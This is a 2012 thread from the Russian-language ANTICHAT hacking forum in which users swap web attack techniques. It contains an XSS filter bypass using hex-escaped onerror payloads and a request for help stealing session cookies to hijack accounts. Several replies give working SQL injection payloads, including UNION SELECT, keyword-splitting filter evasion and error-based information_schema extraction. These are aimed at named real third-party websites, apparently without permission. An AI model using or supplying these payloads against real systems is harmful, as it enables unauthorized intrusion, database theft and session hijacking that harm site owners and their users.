ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.06.2012, 02:57
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251
Репутация:
796
|
|
Сообщение от Nightmarе
Nightmarе said:
Раскрытие путей, по дефолту ошибка это и сообщает, хотя хрен знает что за параметр, и куда ведёт, может что то и по интересней есть...
session_start выплевывает ворнинг в случае, если передан некорректный идентификатор сессии(довольно часто встречающиеся раскрытие)
https://rdot.org/forum/showpost.php?p=23631&postcount=1855
лечится простой заглушкой @session_start();
|
|
|
26.06.2012, 05:35
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от RazyKK
RazyKK said:
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
$replace = array("");
Зависит от того, где будет вывод кода на странице.
В этом примере твоя фильтрация не поможет:
PHP код:
PHP:
[COLOR="#000000"]...
...
document.write('[/COLOR].gif" />');
...
...[/COLOR]
Вектор атаки мог выглядеть так:
http://site.com/show.php?user_id="onerror="alert('XSS');//
Результат:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]'[/COLOR][/COLOR]
Из-за фильтра это сделать не получится. Но так как вывод в данном случае внутри строки JS, мы можем использовать escape-последовательности \x или \u для обхода фильтра:
http://site.com/show.php?user_id=\x22\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x 65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x2F\x2F
P.S.: Это не просто просто пример, придуманный мной. Подобный код встречается в крупнейших почтовых сервисах и соц.сетях.
|
|
|
|
27.06.2012, 14:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
3679
Репутация:
0
|
|
Кто нибудь объясните же мне, наконец!
Раньше спокойно юзал активную xss, куки приходили в полном объёме.Вот к примеру:
Код HTML:
HTML:
SESSd9cc53338c9b7991787e099f00cbe150=hpl0badg2frcecella6toj9kn1; authcache=886e35; drupal_user=*****; drupal_uid=961; __utma=50912437.1205324149.1316182441.1330256374.1330260320.747; __utmb=50912437.500.10.1330260320; __utmc=50912437; __utmz=50912437.1330260320.747.249.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not provided); hotlog=1; DRUPAL_UID=961; has_js=1
Теперь приходят какие то объедки
Код HTML:
HTML:
__utma=50912437.727943270.1327681550.1339957378.1339957644.261; __utmb=50912437.7.10.1339957644; __utmc=50912437; __utmz=50912437.1339957644.261.5.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=******* регистрация; __cfduid=d00e1872cac587b88ebc65d3c4eba687d1338303786; b=b; hotlog=1; b=b
Где SESSID?Где drupal_user?Без них подменная не возможна.
Если ввести
Код HTML:
HTML:
javascript:alert(document.cookie)
то мы получим такую же лабуду без SESSID и т.д.Ладно, попробуем просмотреть куки через браузер(в данном случае Mozilla) Инстурменты->Информация о странице-> Просмотреть куки и-о чудо!Всё на месте, SESSID и т.д.
Так как же быть?Если даже через обычный скрипт
Код HTML:
HTML:
javascript:alert(document.cookie)
нельзя полностью просмотреть куки
Да, возможно у меня квадратный мозг, а эту проблему может решить полный нуб.И всё же, объясните мне, идиоту, как полностью своровать куки |
|
|
|
27.06.2012, 19:07
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от Dad69
Dad69 said:
нельзя полностью просмотреть куки
Да, возможно у меня квадратный мозг, а эту проблему может решить полный нуб.И всё же, объясните мне, идиоту, как полностью своровать куки
у нужных тебе куков установлен флаг HttpOnly . Проблему решит метод TRACE, но на практике почти не юзается.
__________________
|
|
|
|
27.06.2012, 21:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
Ребят, http://tools.phxglobal.com/articles.php?id=-39%20or%201=1 работает но не кидает ошибок - подскажите как решить...
|
|
|
|
27.06.2012, 21:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от LelouchMe
LelouchMe said:
Ребят, http://tools.phxglobal.com/articles.php?id=-39%20or%201=1 работает но не кидает ошибок - подскажите как решить...
http://tools.phxglobal.com/articles.php?id=-39+union+select+1,version(),user(),4,5,6+--+
|
|
|
|
27.06.2012, 22:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
Дико извиняюсь, а тут как быть...? http://m-kat.ru/info.php?search='
|
|
|
|
27.06.2012, 22:23
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от LelouchMe
LelouchMe said:
Дико извиняюсь, а тут как быть...? http://m-kat.ru/info.php?search='
http://m-kat.ru/info.php?search=1'uniololon+seololect+1,2http://bit.ly/MAt6Af,3,4,5и тут ещё что-нибудь напишу,6--+
|
|
|
|
27.06.2012, 22:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от LelouchMe
LelouchMe said:
Дико извиняюсь, а тут как быть...? http://m-kat.ru/info.php?search='
Код:
Code:
http://m-kat.ru/info.php?search='and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
|
|
|
|
28.06.2012, 01:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
Подставил правильное имя таблицы - запрос матерится - не пойму на что... http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM %20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME =aadm_users+LIMIT+0,1+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
